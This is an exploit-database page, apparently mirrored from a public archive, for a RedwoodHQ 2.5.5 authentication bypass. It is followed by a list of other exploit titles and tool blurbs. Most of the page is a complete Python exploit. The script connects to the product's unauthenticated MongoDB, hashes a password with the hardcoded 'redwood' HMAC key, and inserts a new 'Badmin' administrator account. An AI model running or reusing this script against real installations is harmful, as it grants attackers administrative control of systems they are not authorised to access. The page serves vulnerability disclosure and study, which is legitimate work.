Search for hundreds of thousands of exploits

"RedwoodHQ 2.5.5 - Authentication Bypass"

Author

Exploit author

EthicalHCOP

Platform

Exploit platform

multiple

Release date

Exploit published date

2019-06-17

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
# -*- encoding: utf-8 -*-
#!/usr/bin/python3

# Exploit Title:   RedxploitHQ (Create Admin User by missing authentication on db)
# Date: 	       14-june-2019
# Exploit Author:  EthicalHCOP
# Version: 	       2.0 / 2.5.5
# Vendor Homepage: https://redwoodhq.com/
# Software Link:   https://redwoodhq.com/redwood-download/
# Tested on: 	   Ubuntu and Windows.
# Twitter:	       @EthicalHcop
# Usage:           python3 RedxploitHQ.py -H mongo_host -P mongo_port
# Description: 	   Use RedxploitHQ to create a new Admin user into redwoodhq and get all the functions on the framework
# 
# RedwoodHQ doesn't require that MongoDB is installed on the machine because this tool have  her own Mongo Launcher. 
# The problem is that this vendor database doesn't require any authentication to read her data. 
# So, I use the same syntax that use the Framework to create my admin user on the database and access into the tool
# 
# POC:             https://youtu.be/MK9AvoJDtxY

import hashlib
import hmac
import optparse
from pymongo import MongoClient

def CreateHMAC(Pass):
    message = bytes(Pass,encoding='utf8')
    secret = bytes('redwood',encoding='utf8')
    hash = hmac.new(secret, message, hashlib.md5)
    return (hash.hexdigest())

def DbConnect(ip,port):
    uri = "mongodb://" + ip + ":" + port + "/"
    con = MongoClient(uri)
    return con

def DbDisconnect(con):
    con.close()

def CreateBadminUser(ip, port, user, passw):
    con = DbConnect(ip, port)
    db = con.automationframework
    usr = db.users
    passw = CreateHMAC(passw)
    data = {
        "name": user,
        "password": passw,
        "tag": [],
        "role": "Admin",
        "username": user,
        "status": ""
    }
    usr.insert_one(data)
    DbDisconnect(con)

def start():
    parser = optparse.OptionParser('usage %prog ' + \
                                   '-H host -P port')
    parser.add_option('-P', '--Port', dest='port', type='string', \
                      help='MongoDB Port')
    parser.add_option('-H', '--Host', dest='host', type='string', \
                      help='MongoDB Host')
    (options, args) = parser.parse_args()
    ip = options.host
    port = options.port
    if (str(ip) == "None"):
        print("Insert Host")
        exit(0)
    if (str(port) == "None"):
        port = "27017"
    try:
        CreateBadminUser(str(ip), str(port), 'Badmin', 'Badmin')
        print("[+] New user 'Badmin'/'Badmin' created.")
    except Exception as e:
        print("[-] Can't create the 'Badmin'/'Badmin' user. Error: "+str(e))

if __name__ == '__main__':
    start()
Release DateTitleTypePlatformAuthor
2020-07-07"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation"webappsmultiple"William Summerhill"
2020-07-06"RSA IG&L Aveksa 7.1.1 - Remote Code Execution"webappsmultiple"Jakub Palaczynski"
2020-07-02"OCS Inventory NG 2.7 - Remote Code Execution"webappsmultipleAskar
2020-06-24"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting"webappsmultiple"William Summerhill"
2020-06-22"WebPort 1.19.1 - Reflected Cross-Site Scripting"webappsmultiple"Emre Γ–VÜNΓ‡"
2020-06-22"FileRun 2019.05.21 - Reflected Cross-Site Scripting"webappsmultiple"Emre Γ–VÜNΓ‡"
2020-06-22"Odoo 12.0 - Local File Inclusion"webappsmultiple"Emre Γ–VÜNΓ‡"
2020-06-17"OpenCTI 3.3.1 - Directory Traversal"webappsmultiple"Raif Berkay Dincel"
2020-06-15"SOS JobScheduler 1.13.3 - Stored Password Decryption"remotemultiple"Sander Ubink"
2020-06-12"SmarterMail 16 - Arbitrary File Upload"webappsmultiplevvhack.org
Release DateTitleTypePlatformAuthor
2019-06-17"RedwoodHQ 2.5.5 - Authentication Bypass"webappsmultipleEthicalHCOP
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46992/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.